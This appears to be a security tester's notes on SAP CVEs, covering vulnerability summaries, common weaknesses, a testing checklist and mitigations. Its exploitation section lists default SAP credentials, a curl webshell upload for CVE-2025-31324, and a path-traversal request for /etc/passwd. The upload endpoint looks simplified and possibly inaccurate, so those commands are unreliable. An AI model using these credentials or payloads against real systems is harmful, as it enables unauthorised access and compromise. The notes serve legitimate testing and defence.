Known Vulnerabilities & CVEs - SAP Platform

My notes on SAP CVEs. Some are old but still relevant, especially in on-prem deployments that never get patched.

Critical CVEs (recent ones)

CVE-2025-31324 - Unauthenticated File Upload

• CVSS Score: 9.8 (Critical)
• Affected Versions: SAP NetWeaver AS Java Visual Composer
• Type: Unauthenticated File Upload
• Impact: Remote Code Execution
• Description: Unauthenticated file upload in Visual Composer's Metadata Uploader = RCE
• Exploitation: No auth needed, just upload a malicious file
• Status: Exploited in the wild! Public exploit available
• Mitigation: Apply SAP Security Note, disable Visual Composer if not needed
• References:
  • Tenable Analysis
  • CVE Details

CVE-2025-42999 - Deserialization Vulnerability

• CVSS Score: 8.8 (High)
• Affected Versions: SAP NetWeaver AS Java Visual Composer
• Type: Deserialization
• Impact: Remote Code Execution
• Description: Deserialization vuln in Visual Composer = RCE
• Exploitation: Need authenticated access
• Mitigation: Apply SAP Security Note, disable Visual Composer if not needed
• References:
  • Tenable Analysis

CVE-2025-0070 - Authentication Bypass

• CVSS Score: 8.1 (High)
• Affected Versions: SAP NetWeaver AS for ABAP
• Type: Improper Authentication
• Impact: Privilege Escalation
• Description: Auth bypass in NetWeaver AS for ABAP
• Exploitation: Need some level of access first
• Mitigation: Apply SAP Security Note
• References:
  • BleepingComputer

CVE-2025-0066 - Information Disclosure

• CVSS Score: 7.5 (High)
• Affected Versions: SAP NetWeaver AS for ABAP
• Type: Information Disclosure
• Impact: Unauthorized Access to Information
• Description: Info disclosure in NetWeaver AS for ABAP
• Exploitation: Can leak sensitive system information
• Mitigation: Apply SAP Security Note
• References:
  • BleepingComputer

CVE-2024-41730 - Missing Authentication Check

• CVSS Score: 9.8 (Critical)
• Affected Versions: SAP BusinessObjects BI Platform
• Type: Missing Authentication Check
• Impact: Unauthorized Access
• Description: Missing auth check in BusinessObjects BI Platform = full system compromise
• Exploitation: No auth needed, get login token via REST endpoint
• Mitigation: Apply SAP Security Note
• References:
  • SAP Community

Common vulnerability patterns I've seen

1. Default Credentials

• admin/admin - Common default
• sap/sap - Another common default
• DDIC/19920707 - Development user
• SAP/PASS* - System user
• TMSADM/ADMIN - Transport Management System
• EarlyWatch/SUPPORT - Monitoring user

2. Unpatched Systems

• Missing Security Notes - SAP releases monthly security patches
• Legacy Versions - Old, unsupported versions
• Custom Patches - Modified systems that can't be patched
• Test Systems - Often left unpatched

3. Misconfigured Services

• Exposed RFC Interfaces - Should be internal only
• Weak ICM Configuration - Exposes internal systems
• Insecure Web Dispatcher - Load balancer misconfigurations
• Debug Mode Enabled - Development features in production

4. Custom Code Vulnerabilities

• ABAP Injection - SQL injection in custom ABAP code
• Authorization Bypass - Custom code doesn't check permissions
• Input Validation - Missing input validation
• Business Logic Flaws - Workflow manipulation

5. File Upload Issues

• Unrestricted File Upload - Can upload any file type
• Path Traversal - ../../../etc/passwd type stuff
• Webshell Upload - Upload malicious JSP/ASP files
• Document Attacks - Malicious PDFs, Office docs

My testing checklist

Before I start

• Check SAP version and build
• Map exposed services and ports
• Look up security advisories for that version
• Check for known vulnerable components

During testing

• Test CVE-2025-31324 (unauthenticated file upload)
• Test CVE-2025-42999 (deserialization)
• Test CVE-2025-0070 (auth bypass)
• Test CVE-2025-0066 (info disclosure)
• Test CVE-2024-41730 (missing auth check)
• Check for default credentials
• Test RFC interfaces
• Check ICM/Web Dispatcher config
• Test custom code for vulnerabilities

After testing

• Document findings with CVSS scores
• Write remediation recommendations
• Check if SAP Security Notes are available
• Test if mitigations work

Exploitation Techniques

Default Credentials

# Common default credentials to try
admin:admin
sap:sap
DDIC:19920707
SAP*:PASS
TMSADM:ADMIN
EarlyWatch:SUPPORT

# Test with SAP GUI or web interface

CVE-2025-31324 Exploitation

# Unauthenticated file upload
curl -X POST "https://target-sap.com/sap/bc/ui2/nwbc/visualcomposer/metadata" \
  -F "file=@webshell.jsp" \
  -F "name=webshell.jsp"

# Access uploaded file
curl "https://target-sap.com/sap/bc/ui2/nwbc/visualcomposer/metadata/webshell.jsp"

RFC Interface Testing

# Check for exposed RFC interfaces
nmap -p 3300 target-sap.com

# Test RFC connection (if you have SAP tools)
# Use SAP GUI or custom scripts

ICM/Web Dispatcher Testing

# Check for exposed ICM
nmap -p 8000,44300 target-sap.com

# Test for path traversal
curl "https://target-sap.com/sap/bc/ui2/nwbc/../../../etc/passwd"

# Test for information disclosure
curl "https://target-sap.com/sap/bc/ui2/nwbc/error"

Mitigation Strategies

Immediate Actions

1. Apply Security Notes - Install latest SAP Security Notes
2. Change Default Credentials - Change all default passwords
3. Secure RFC Interfaces - Restrict access to internal networks only
4. Configure ICM Properly - Don't expose internal systems
5. Disable Unused Services - Turn off Visual Composer if not needed

Long-term Security

1. Regular Patching - Monthly SAP Security Note updates
2. Security Testing - Regular penetration testing
3. Configuration Management - Secure configuration baselines
4. Incident Response - SAP-specific response procedures

References

• SAP Security Notes
• SAP Security Patch Day
• CVE Database
• NIST Vulnerability Database
• SecurityBridge SAP Security Blog
• Onapsis SAP Security Research